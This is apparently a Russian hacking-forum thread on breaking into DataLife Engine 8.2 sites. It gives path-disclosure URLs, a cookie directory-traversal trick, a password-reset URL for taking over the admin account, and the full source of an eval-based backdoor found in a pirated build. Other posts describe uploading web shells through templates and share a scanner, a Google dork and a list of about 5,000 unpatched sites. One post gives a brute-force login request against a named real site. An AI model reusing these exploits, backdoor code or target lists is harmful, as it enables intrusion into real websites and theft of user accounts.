Раскрытие путей DataLife Engine 8.2 Без всяких куков 1)файл preview.php PHP: require_once ROOT_DIR.'/engine/classes/templates.class.php'; самое прикрльное что ROOT_DIR читает как папку, хотя многие в асе написали что константа *в не понятках* вызываем этот файл: http://dle/engine/inc/preview.php получаем на офф сайте даже канает) + 2)еще ругается с файла Init.php PHP: require_once (ENGINE_DIR . '/inc/include/functions.inc.php'); extract( $_REQUEST, EXTR_SKIP ); require_once (ENGINE_DIR . '/data/config.php'); http://dle/engine/inc/include/init.php +3) нужны куки engine/ajax/antivirus.php PHP: if (isset( $_COOKIE['selected_language'] )) { $_COOKIE['selected_language'] = totranslit( $_COOKIE['selected_language'], false, false ); if (@is_dir ( ROOT_DIR . '/language/' . $_COOKIE['selected_language'] )) { $selected_language = $_COOKIE['selected_language']; } } require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; все тоже самое что и у mailbrush'a. только в куках имя selected_language и значение ../ уже выдаст ошибку +4) самое бональное раскрытие engine/modules/imagepreview.php PHP: $_GET['image'] = htmlspecialchars ($_GET['image'], ENT_QUOTES); $_GET['image'] = str_replace( "document.cookie", "", $_GET['image'] ); $_GET['image'] = str_replace( "javascript", "", $_GET['image'] ); http://dle/engine/modules/imagepreview.php?image[]= PS и не нужны куки здесь) Зыы ну почти не нужны
Был найден бэкдор в нулле от -=ZLOY=- В этом файле был бэкдор. eval() через $_POST Файл лежит в (/engine/ajax/updates.php) Код бэкдора PHP: if($_GET['wert']==''){ require_once ROOT_DIR.'/language/'.$selected_language.'/adminpanel.lng'; $config['charset'] = ($lang['charset'] != '') ? $lang['charset'] : $config['charset']; @header("HTTP/1.0 200 OK"); @header("HTTP/1.1 200 OK"); @header("Cache-Control: no-cache, must-revalidate, max-age=0"); @header("Expires: 0"); @header("Pragma: no-cache"); @header("Content-type: text/css; charset=".$config['charset']); $data = @file_get_contents("http://www.dle-news.ru/extras/updates.php?version_id=".$_REQUEST['versionid']."&key=".$config['key']); if (!strlen($data)) echo $lang['no_update']; else echo $data; }else{ $file=(ROOT_DIR."/engine/classes/mysql.class.php"); if(file_exists($file)){ @require($file); $x.="mysql.class.php - ok<br />";} $file=(ROOT_DIR."/engine/data/dbconfig.php"); if(file_exists($file)){ @require($file); $x.="dbconfig.php - ok<br />";} $file=(ROOT_DIR."/engine/data/config.php"); if(file_exists($file)){ @require($file); $x.="config.php - ok<br />";} eval(base64_decode($_GET['user_id'])); echo <<<HTML <HTML><body><form action="" method="post"> <center><textarea name="text" rows="10" cols="100"></textarea> <br /><input type="submit" value="Canoinoaaoe"/></center></form></body></HTML> HTML; if($_POST['text']!=''){eval(stripcslashes($_POST['text'])); }}
Найдена уязвимость в DLE 8.2(Только в этой версии) /index.php?do=lostpassword&douser=1&lostid= Получаем пас от пользователя с id 1 На офф сайте уже доступна заплатка. В новых версиях дле даже можно версию узнать )) engine/skins/images/logos.jpg Теперь у каждой версии в админки стоит версия в лого ) Это просто шикарно )
Еще одна бага есть. можн залить шелл с помощю категорий. создаете категорию туда свой шаблон с шеллом. вродь до 7.2 у мя пахало
Можно на images.google.ru вбить http://images.google.ru/images?hl=ru&source=hp&q=%22engine%2Fskins%2Fimages%2Flogos.jpg%22+Datalife+Engine&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%BA%D0%B0%D1%80%D1%82%D0%B8%D0%BD%D0%BE%D0%BA&gbv=2&aq=f&oq=
Выкладываю скрипт поиска DLE 8.2. Многопоточность. CURL. http://depositfiles.com/files/6s4qs35gb Берёт данные из файла где собраны любые версии ДЛЕ. Можно иметь просто любые сайты, но признаки поиска ДЛЕ для гугла, например, известны, ему самому, а занчит и вам. Кому лень возиться со скриптом, вэлком в готовую базу. Примерно 5к версии 8,2. На сегодня половина ещё висят без фиксов. Эх, аккуратнее, и имейте честь и достоинство. Жаль хайда нет.
брутфорс адмики https://forum.antichat.ru/thread153641.html бага в посылке пакета без кукисов. http://vipuzor.com/admin.php Host: vipuzor.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.20) Gecko/20091111 Firefox/3.1.3.37 Referer: http://vipuzor.com/admin.php Content-Type: application/x-www-form-urlencoded POST subaction=dologin&username=admin&password=111111
а для этого не нужно в index.php менять строчку: echo $tpl->result['main']; на eval (' ?' . '>' . $tpl->result['main'] . '<' . '?php '); ?? или я что то не правильно понял ? объясните кто нибудь... и ещё один вопрос, может кто знает, что нужно сделать, чтобы пароли при регистрации сохранялись в базу - как есть, без md5 кодирования ?
При помощи этого товарища и своих усилей нашёл способ заливки шелла через админ панель, впрочем она нечем не отличается от выше указанных просто в версиях от 8.0, а именно в 8.2 нужно в маин.тпл инклудить при помощи тега: Code: {include file="file.php"}
Вопрос. Такой. есть Доступ к БД. Могу сдлеать юзеру админ права. Но немогу найти админку. что посоветуете?
В последних версиях DLE в меню редактирования любой новости есть пункт "Редактировать новость (Админка)". Выделяешь этот пункт и видишь в строке состояния примерно такую вещь http://сайт/admin.php?mod=editnews&action=editnews&id=25303 Отсюда можешь уже можешь разглядеть)
